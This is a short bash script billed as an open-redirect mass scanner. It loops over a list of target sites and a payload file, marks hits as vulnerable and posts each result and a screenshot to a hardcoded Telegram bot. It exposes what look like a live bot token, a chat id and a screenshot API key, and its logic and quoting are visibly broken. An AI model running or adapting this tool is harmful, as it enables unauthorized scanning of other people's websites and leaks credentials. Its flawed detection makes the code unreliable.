
#!/bin/bash
#openredirect Mass Scanner By Adelittle
#0byte,IDX,ISD-Team
LISTS=$1

if [[ ! -f ${LISTS} ]]; then
	echo "ERROR: ${LISTS} not found"
	echo "usage: bash $0 list.txt"
	exit
fi

list(){
	IFS=$'\n'
	for SITE in $(cat $LISTS); do
		echo "Scanning >>> ${SITE}"
			for vuln in $(cat vuln.txt); do
			string=$(echo $vuln | cut -f 1 | tr -d '\r');

		
	if [[ $(curl --connect-timeout 2 --max-time 2 -A "Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-N920C Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/6.2 Chrome/56.0.2924.87 Mobile Safari/537.36" -L -I -s "https://${SITE}${string}" ) =~ '200' ]]; then
		echo "[+] VULN: ${SITE}${string}"
		echo "https://${SITE}${string}" >> scan_res.txt
		wget "https://api.screenshotmachine.com/?key=1a4e2e&url=https://${SITE}${string}&dimension=1024x768" -O ss.jpg
		curl "https://api.telegram.org/bot{2125246923:AAGdbu32Ysjdtzn96aI-BT7SQrxwXnAQ2qY}/sendMessage?text={https://${SITE}${string}}&chat_id={1851935675}"
		curl ""https://api.telegram.org/bot{2125246923:AAGdbu32Ysjdtzn96aI-BT7SQrxwXnAQ2qY}/sendPhoto" -F chat_id=1851935675 -F photo="@ss.jpg""
	else
		echo "NOT VULN: ${SITE}${string}"
	fi
			done
	done
}
list

export -f list
echo -e "===============[Let's Go!]==============="
sort -u $SITE | xargs -P 50 -n1 bash -c 'list "$@"' _
